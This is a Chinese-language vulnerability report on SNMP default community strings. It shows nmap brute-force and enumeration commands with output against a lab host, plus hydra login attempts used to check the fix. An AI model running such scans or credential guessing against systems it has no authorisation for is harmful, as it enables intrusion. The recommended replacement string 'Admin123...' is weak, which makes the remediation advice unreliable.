1. 漏洞報告
2. 漏洞介紹
SNMP是英文"Simple Network Management Protocol"的縮寫,中文意思是"簡單網絡管理協議"。簡單網絡管理協議(SNMP)是TCP/IP協議簇的一個應用層協議,工做在UDP 161端口,用於監控目標設備的操做系統、硬件設備、服務應用、軟硬件配置、網絡協議狀態、設備性能及資源利用率、設備報錯事件信息、應用程序狀態等軟硬件信息。SNMP包含SNMPv1(采用團體名認證機制)、SNMPv2c(同版本1,提供更多的錯誤識別代碼)和SNMPv3(采用基於用戶的安全模型認證機制)三個版本。該協議容易實現且其廣泛的TCP/IP應用基礎被眾多設備廠商支持,用於防火牆、路由器、交換機和網橋等設備。但該協議v1和v2版本存在“public”和“private”團體默認值漏洞,攻擊者可利用“public”默認值遠程讀取網絡設備信息,利用“private”默認值獲取網絡設備管理權,對網絡進行攻擊和破壞。
3. 漏洞危害
在遠程網絡管理中,SNMP協議通常用"public"和"private"作為團體默認值,分別對應於"讀"和"寫"。但這種團體默認值存在安全漏洞,攻擊者可利用此漏洞來獲取有關遠程主機的更多信息或者對內部網絡進行破壞。
4. NMAP漏洞檢測和利用
## 漏洞檢測
λ nmap -sU -sV -Pn -p 161 --script="snmp-brute" 192.168.43.58
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 99e37402dc755153
| snmpEngineBoots: 33
|_ snmpEngineTime: 2h37m13s
## 漏洞利用
## 嘗試通過SNMP枚舉正在運行的進程。
nmap -sU -sV -Pn -p 161 --script="snmp-processes" 192.168.43.58
## 嘗試從SNMP版本1服務中提取系統信息
nmap -sU -sV -Pn -p 161 --script="snmp-sysdescr" 192.168.43.58
## 嘗試查詢SNMP以獲取類似netstat的輸出
nmap -sU -sV -Pn -p 161 --script="snmp-netstat" 192.168.43.58
## 嘗試通過SNMP枚舉網絡接口
λ nmap -sU -sV -Pn -p 161 --script="snmp-interfaces" 192.168.43.58
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 99e37402dc755153
| snmpEngineBoots: 33
|_ snmpEngineTime: 3h09m12s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Status: up
| Traffic stats: 14.70 Kb sent, 14.70 Kb received
| eth0
| IP address: 192.168.43.58 Netmask: 255.255.255.0
| MAC address: 00:0c:29:3e:ba:70
| Type: ethernetCsmacd Speed: 10 Mbps
| Status: up
|_ Traffic stats: 4.48 Mb sent, 4.13 Mb received
5. 漏洞修復
修改配置文件/etc/snmp/snmpd.conf將Public改成其他具有復雜度的字符串如Admin123...,保存后重新啟動SNMP服務即可。
C:\root\桌面> cat /etc/snmp/snmpd.conf | grep Admin123... -A 2 -B 2
# sec.name source community
#com2sec paranoid default public
com2sec readonly default Admin123...
com2sec readwrite default Admin123....
####
C:\root\桌面> /etc/init.d/snmpd restart
Restarting network management services: snmpd.
Kali使用hydra暴力破解工具進行驗證
## 使用原字符串進行登錄嘗試失敗
C:\root\桌面> hydra -p public -s 161 192.168.43.58 snmp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-19 17:23:18
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking snmp://192.168.43.58:161/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-19 17:23:26
## 使用修改后的字符串進行登錄嘗試成功
C:\root\桌面> hydra -p Admin123... -s 161 192.168.43.58 snmp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-19 17:23:07
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking snmp://192.168.43.58:161/
[161][snmp] host: 192.168.43.58 password: Admin123...
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-19 17:23:07